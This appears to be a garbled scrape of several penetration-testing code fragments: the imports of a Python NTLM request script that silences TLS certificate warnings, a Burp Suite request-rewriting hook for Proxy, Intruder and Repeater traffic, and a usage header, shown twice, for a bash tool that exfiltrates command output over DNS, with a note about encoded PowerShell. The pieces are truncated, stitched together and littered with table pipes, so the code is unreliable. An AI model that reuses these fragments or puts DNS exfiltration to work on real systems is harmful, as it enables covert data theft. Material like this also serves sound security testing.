import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
# Turn off urllib3's InsecureRequestWarning for the whole process. This only
# silences the warning; it does not change whether TLS certificates are checked.
# NOTE(review): the request calls are not visible in this excerpt -- presumably
# they pass verify=False; confirm, because with the warning suppressed an
# unverified HTTPS connection leaves no trace in the script's output.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
# ***********************************************replacer_for_python_scripter | |
import re,random | |
print callbacks.getToolName(toolFlag) | |
if(messageIsRequest): | |
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
requestInfo = helpers.analyzeRequest(messageInfo) | |
headers = requestInfo.getHeaders() | |
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
msg = helpers.bytesToString(msgBody) |
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |